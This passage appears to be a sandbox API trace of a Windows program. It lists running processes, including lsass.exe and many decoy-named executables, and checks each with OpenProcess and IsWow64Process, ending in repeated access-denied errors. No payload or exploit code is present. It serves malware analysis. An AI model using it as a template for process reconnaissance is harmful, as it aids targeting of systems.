	[0070.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0070.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0070.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0070.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0070.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0070.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0070.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc80, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0070.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0070.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0070.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0070.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0070.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0070.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0070.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0070.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0070.737] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.737] CloseHandle (hObject=0x224) returned 1
	[0070.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0070.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0070.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0070.738] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.738] CloseHandle (hObject=0x224) returned 1
	[0070.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728838, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0070.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0070.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0070.738] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.738] CloseHandle (hObject=0x224) returned 1
	[0070.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0070.738] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.738] CloseHandle (hObject=0x224) returned 1
	[0070.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0070.739] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.739] CloseHandle (hObject=0x224) returned 1
	[0070.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0070.739] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.739] CloseHandle (hObject=0x224) returned 1
	[0070.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728998, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0070.739] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.739] CloseHandle (hObject=0x224) returned 1
	[0070.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0070.739] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.739] CloseHandle (hObject=0x224) returned 1
	[0070.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0070.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0070.740] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.740] CloseHandle (hObject=0x224) returned 1
	[0070.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0070.740] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.740] CloseHandle (hObject=0x224) returned 1
	[0070.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0070.740] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.740] CloseHandle (hObject=0x224) returned 1
	[0070.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728978, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0070.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0070.740] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.740] CloseHandle (hObject=0x224) returned 1
	[0070.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0070.741] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.741] CloseHandle (hObject=0x224) returned 1
	[0070.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd20, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0070.741] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.741] CloseHandle (hObject=0x224) returned 1
	[0070.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728858, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0070.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0070.741] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.741] CloseHandle (hObject=0x224) returned 1
	[0070.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e888, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0070.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0070.741] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.741] CloseHandle (hObject=0x224) returned 1
	[0070.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7288f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0070.741] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.741] CloseHandle (hObject=0x224) returned 1
	[0070.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0070.741] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.742] CloseHandle (hObject=0x224) returned 1
	[0070.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0070.742] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.742] CloseHandle (hObject=0x224) returned 1
	[0070.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0070.742] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.742] CloseHandle (hObject=0x224) returned 1
	[0070.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7288f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0070.742] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.742] CloseHandle (hObject=0x224) returned 1
	[0070.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0070.742] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.742] CloseHandle (hObject=0x224) returned 1
	[0070.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0070.742] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.743] CloseHandle (hObject=0x224) returned 1
	[0070.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e810, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0070.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0070.743] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.743] CloseHandle (hObject=0x224) returned 1
	[0070.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0070.743] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.743] CloseHandle (hObject=0x224) returned 1
	[0070.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0070.743] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.743] CloseHandle (hObject=0x224) returned 1
	[0070.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728a58, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0070.743] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.743] CloseHandle (hObject=0x224) returned 1
	[0070.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0070.743] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.743] CloseHandle (hObject=0x224) returned 1
	[0070.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728858, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0070.744] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.744] CloseHandle (hObject=0x224) returned 1
	[0070.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0070.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0070.744] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.744] CloseHandle (hObject=0x224) returned 1
	[0070.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0070.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0070.744] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.744] CloseHandle (hObject=0x224) returned 1
	[0070.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
